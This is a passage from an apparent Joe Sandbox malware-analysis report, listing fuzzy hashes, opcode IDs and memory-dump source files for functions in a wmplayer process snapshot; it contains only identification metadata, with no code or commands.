            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
            • Instruction Fuzzy Hash: 5C715EB5A0061AEFCB10DFE9C984ADEBBB9FF48700F1445A9E505EB650DB34EA01CB50
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 996c6d588f9e078e6f8a4242326751a86649d7aeb6feb35ed0186c6c1815fd5f
            • Instruction ID: 0669acd9cf2523f8f45234d2f00cd14020bfb650fa6f77780d2f1ed0c91aaf0e
            • Opcode Fuzzy Hash: 996c6d588f9e078e6f8a4242326751a86649d7aeb6feb35ed0186c6c1815fd5f
            • Instruction Fuzzy Hash: 7871F236210B45EFDB31DFA8C844F6AB7A6EF84724F1848ACE155CB6A0E774E944CB50
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c80cb6c654f3a78efef1338952cfddabee062ad737b2c2a0f24e03971c1df182
            • Instruction ID: dfc74398d2c5e772e7eab1011212bdb97b356979cf88c9b8df3556edea05e8b4
            • Opcode Fuzzy Hash: c80cb6c654f3a78efef1338952cfddabee062ad737b2c2a0f24e03971c1df182
            • Instruction Fuzzy Hash: FF819075A00609DFCB09CFA8C494AAEB7F1FF88300F1981A9D859EB341D734EA41CB90
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3250cf024880870faa9c5ad1c26047e068f1f29bab5294ff4f285e687626646f
            • Instruction ID: 2273140ae4edc3b4749dafbc22235ce0d01fe021dca60118836202fe99fed868
            • Opcode Fuzzy Hash: 3250cf024880870faa9c5ad1c26047e068f1f29bab5294ff4f285e687626646f
            • Instruction Fuzzy Hash: C461FF75600715AFD715DFA8C884FABBBA9FF88314F044699FA68CB240DB30E514CB92
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 452edfbfcf0e94ae9579f2424e653f9f0e782d4fcd20f6cafa21f2e1fa618322
            • Instruction ID: 6406965f086ba6e9c82f1113a33b4eba4c353da444db4f8b0277176e79e13ef5
            • Opcode Fuzzy Hash: 452edfbfcf0e94ae9579f2424e653f9f0e782d4fcd20f6cafa21f2e1fa618322
            • Instruction Fuzzy Hash: 1761D2356047428FD311CFE8C494B6AB7E0BF90718F1844EDEA95CB291DB75E806CB92
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 261628b4c0ce8484c6031211770c0ce0fbb28df667791e2b91efc709e5564ff0
            • Instruction ID: 79918b16966348f003755fa3e4d4aa25a61bfede3ae6371f7e18e2b77f42e50c
            • Opcode Fuzzy Hash: 261628b4c0ce8484c6031211770c0ce0fbb28df667791e2b91efc709e5564ff0
            • Instruction Fuzzy Hash: 52412375601B14AFCB26EFA9D880B2ABBA9EF40720F1544E9E549CF250DB70DC80CB90
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 509a2c55ce54a41229e56678be0c357681a649a505367bd8187faa01e4e3560c
            • Instruction ID: 1edf9a8dddd538e4372f83734b54718913ec847087b5d73e36828a5c80bed974
            • Opcode Fuzzy Hash: 509a2c55ce54a41229e56678be0c357681a649a505367bd8187faa01e4e3560c
            • Instruction Fuzzy Hash: 2F51DD76A0460AAFEB15DBA8C848BADB7B4BF45314F1840EAE402E7390DB749901CB81
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
            • Instruction ID: 3f5e18785c6a06264d425c3460866a9dd0d2d228bb65cc75348d814591c353db
            • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
            • Instruction Fuzzy Hash: BC516C766087469FC311CFA8C884B5ABBE5FBC8344F04896DFA94DB244D734E949CB92
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4094c6502c39d1d731f1cf305bb035faa1a88a7ae08f7a0eb0dc3de2060effa8
            • Instruction ID: b005fbed5598a6996e000ff30227f9765ceb6e596d24eb2849d13a6cb084054b
            • Opcode Fuzzy Hash: 4094c6502c39d1d731f1cf305bb035faa1a88a7ae08f7a0eb0dc3de2060effa8
            • Instruction Fuzzy Hash: EE517A75A05319DFEF21DAE9C840BADB3B8BB4B718F1804D9E811EB350D7B59940CB92
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8f45adb53c8f08393f1d1b25220cc8f94eb6accd3328aa103b40358d9b1839f4
            • Instruction ID: 4e62361e391e788de25f8af4534774a0c8b5de5a1556b23bae1e1b3bb7bf28d4
            • Opcode Fuzzy Hash: 8f45adb53c8f08393f1d1b25220cc8f94eb6accd3328aa103b40358d9b1839f4
            • Instruction Fuzzy Hash: B941B0B69042189BCB15DFE8C440AEDF7B4BF88714F18819AE816FB340D7349D41CBA9
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dca7b6243bff59e9ef1a4165e2370ab8c3a4188e538f443528fe59cb8f2c20f3
            • Instruction ID: 6ee9fffaca05a82db7059ddc4e214bc7603421db4cef9e5c50eab4745dc922f4
            • Opcode Fuzzy Hash: dca7b6243bff59e9ef1a4165e2370ab8c3a4188e538f443528fe59cb8f2c20f3
            • Instruction Fuzzy Hash: 8551077090461AEBDB25DBACCC44BA8BBB5EF02318F1942E5D425DB7C0E7789981CF81
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ab4a37587c3a749f685c783aae75f6446d564923da48f9f10bcd2d7fb23c3ecb
            • Instruction ID: 20c9c9c0068b13b4805291dd1c5cc4f3da263d8f4c47b1310159a51dfd60ae80
            • Opcode Fuzzy Hash: ab4a37587c3a749f685c783aae75f6446d564923da48f9f10bcd2d7fb23c3ecb
            • Instruction Fuzzy Hash: EA4168B5641715AFDB22EFE8C880B2ABBF8EF40794F0484E9E511DB650D774D880CBA1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
            • Instruction ID: 09c726aa4c3b650cebf03845b6edebce30ca4a73f8e20a6b8b93337b10bdfc6a
            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
            • Instruction Fuzzy Hash: 26412B31A00225DBDB29EFD984507BAFB62EFD0754F1980EAE945DB240DA399DC0CB91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
            • Instruction ID: 055eadf0f94ae92eb2e8e29caaf7dbd2826d3da80a9317cafe60220edb9738c0
            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
            • Instruction Fuzzy Hash: 59312572A04248AFDB21CBE8CC40B9AFFE8FF44314F0885E6E815DB352D2749840CBA1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: f0813a145ccf423da9a7c8d969538231cd095f7f5a95ac91cefa7edbc0d6251f
            • Instruction ID: 7e4c7b6a464aa88728281d36fcbc2b2945c5569025f31025b2779f0d0dd686dd
            • Opcode Fuzzy Hash: f0813a145ccf423da9a7c8d969538231cd095f7f5a95ac91cefa7edbc0d6251f
            • Instruction Fuzzy Hash: 99316275A00728EFDB21DBA8CC40B9AB7B5AF85714F5501D9F94CEB280DB309E44CB51
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 571c296465a9198f3fe77c75ba525d6f7eb7c2fae537ca3c4012fb960fdfd9ab
            • Instruction ID: 93ae91733355cf3a179e2dee0593a005ff05e9958fa53004e562f97540b6d442
            • Opcode Fuzzy Hash: 571c296465a9198f3fe77c75ba525d6f7eb7c2fae537ca3c4012fb960fdfd9ab
            • Instruction Fuzzy Hash: E641BF75200B44DFDB22DFE9C880F9AB7E9AB46314F1844AAE599CF750C774E804CB91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
            • Instruction ID: 03de6c872d3493f9c874e7b0673d98c918236f1bcb0c860eca580d5b794453df
            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
            • Instruction Fuzzy Hash: BA31F7317483459BDB22DAA8C800767FBD9AB86754F4C85EAFC86CB380D274D841C792
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d61f34d193c8c5b979c59623681da04c80f37aacd5b1572a80441f953fe78d9e
            • Instruction ID: a9218496486b83c0ffb917e23a4c0cfc19dda637a9d61e9f29ccf5c84141b119
            • Opcode Fuzzy Hash: d61f34d193c8c5b979c59623681da04c80f37aacd5b1572a80441f953fe78d9e
            • Instruction Fuzzy Hash: FF31A176A00259EFDB15DFE8C840BAEB7B5EB44B40F5942A9E500EB244E774ED00CB94
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8746f7629faecc1b16b53223d0140f3c2bd527c423c671ce4ad6b18062bfe303
            • Instruction ID: ea7b14710c9e6afd5636929323cbe60f31033111a4db6930c4ed26fb6fb8954d
            • Opcode Fuzzy Hash: 8746f7629faecc1b16b53223d0140f3c2bd527c423c671ce4ad6b18062bfe303
            • Instruction Fuzzy Hash: F331E235700719AFDB12EFE9C840B6EBBB9AF84754F1402E9E641EB341EA30DC408B91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7dff0c9ddd77fdeb848cb078552c977c431ab8c284d56ed0699988f351321c3e
            • Instruction ID: 5773cb1e9140d3c95eb90500c52b1ef5040df5a4cef0d9bd98a6e6da1983940e
            • Opcode Fuzzy Hash: 7dff0c9ddd77fdeb848cb078552c977c431ab8c284d56ed0699988f351321c3e
            • Instruction Fuzzy Hash: 313105B6A04755DBC711EEA88C80A6BBBA9EF86650F0545A8FC56DB310DA30DC00C7D2
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: df31f734553a4d12538ab081850cba39e1c385816811222066560da505adeebf
            • Instruction ID: 80d2ce4d7792c50c1a33237109431a0a911d2dc0a7e81afd444f65b64ff36041
            • Opcode Fuzzy Hash: df31f734553a4d12538ab081850cba39e1c385816811222066560da505adeebf
            • Instruction Fuzzy Hash: 4B318D79715A09FFDB51DBA4CE40AAABBA6FF85204F4850A5E901DBB50D734E830CBC1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 50ad277244ab3abeeda72f1eed2f8ffa6471019efd451a7b2378d2e4a8f9d00f
            • Instruction ID: 9b33c8d7b8ac9d787015f19de6ac1e2a52cbd5d2a2014a49b1a2db1b7680a06f
            • Opcode Fuzzy Hash: 50ad277244ab3abeeda72f1eed2f8ffa6471019efd451a7b2378d2e4a8f9d00f
            • Instruction Fuzzy Hash: A631F631B017459FDB20EFE9C880A6FB7F9AB80305F0484AAE805D7650D730EA85CB51
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
            • Instruction ID: 7e509502f056cc668e9d135a8702137a736344bc35e12d6dc9103265794d919e
            • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
            • Instruction Fuzzy Hash: 913170B56083499FCB01DF98D840A5ABBE9EF89354F0409AAF855DB391D734DC14CBA2
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
            • Instruction ID: 5b6f55650d48e3ca192e17b479ed2f3aed7e6741e317f66e48229969399b35cf
            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
            • Instruction Fuzzy Hash: D9312279604206CFC710CF68C480956BBF5FF89354B2986A9F958DB325EB30E906CB91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
            • Instruction ID: 2ccfe20c068392f76520d31c51592472c70c1647861316535ec8b84dead6b1a5
            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
            • Instruction Fuzzy Hash: 97212D3FA0075566CB14EBE98800ABAFBB5EF41714F40809AFD66CB551E635DA50C361
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fc7ddfa47a38822fcd2135bc1b8970aa8a3656dfeaa90e9066c379a4bcf90afd
            • Instruction ID: a6cfa9db7885eae8d14fe2bcdc97436abadd67cde802dfffac75aa417d4eee44
            • Opcode Fuzzy Hash: fc7ddfa47a38822fcd2135bc1b8970aa8a3656dfeaa90e9066c379a4bcf90afd
            • Instruction Fuzzy Hash: 1631E5B65003148BCB30FFA8CC41BA9B7B8AF41314F5881E9D845DF7C1DA74998ACBA1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
            • Instruction ID: c359836e5e463cdf6e2675f191a6f76194a24882a6e5dd294faa36daf367ebaa
            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
            • Instruction Fuzzy Hash: 7D31A931600618EFD721CBA8C884F6ABBF8EF85318F1444A8E502CB290E730EA42CB51
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
            • Instruction ID: 225988bd87aaf18a1bb820528ffa3631f6b843b5119840e1df644c3435427829
            • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
            • Instruction Fuzzy Hash: 4821C272200304DFD719DF55C441B66BBE9EF95365F1541ADE606CB290EB70E801CB94
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
